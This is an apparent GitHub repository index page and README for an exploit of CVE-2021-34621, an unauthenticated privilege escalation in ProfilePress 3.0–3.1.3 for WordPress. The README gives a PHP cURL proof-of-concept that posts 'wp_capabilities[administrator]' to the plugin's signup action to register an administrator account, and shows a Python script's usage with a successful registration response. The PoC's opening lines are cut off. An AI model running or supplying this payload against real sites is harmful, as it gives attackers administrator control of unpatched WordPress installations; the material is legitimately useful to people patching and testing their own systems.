https://github.com/randomrobbiebf/cve-2021-34621

ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
https://github.com/randomrobbiebf/cve-2021-34621

cve-2021-34621 wordpress wordpress-exploit

Last synced: 18 days ago
JSON representation

ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

• Host: GitHub
• URL: https://github.com/randomrobbiebf/cve-2021-34621
• Owner: RandomRobbieBF
• License: gpl-3.0
• Created: 2023-08-09T11:41:56.000Z (almost 3 years ago)
• Default Branch: main
• Last Pushed: 2023-08-09T11:45:32.000Z (almost 3 years ago)
• Last Synced: 2025-01-21T05:41:43.931Z (over 1 year ago)
• Topics: cve-2021-34621, wordpress, wordpress-exploit
• Language: Python
• Homepage:
• Size: 16.6 KB
• Stars: 0
• Watchers: 2
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
# CVE-2021-34621

ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

# Description

The user registration functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during registration which made it possible for users to register as an administrator. 

# POC

```

 'Hax0r',

    'reg_email' => 'Hax0r@Hax0r.com',

    'reg_password' => 'password',

    'reg_password_present' => 'true',

    'reg_first_name' => 'Hax0r',

    'reg_last_name' => 'Hax0r',

    'wp_capabilities[administrator]' => '1',

    'action' => 'pp_ajax_signup',

    'melange_id' => ''

]);

$output = curl_exec($ch);

curl_close($ch);

print_r($output);

```

Script Usage

---

```

$ python3 CVE-2021-34621.py --url http://wordpress.lan --username test2 --email test2@test.com --password test

{"message":"
Registration successful.<\/div>"}

```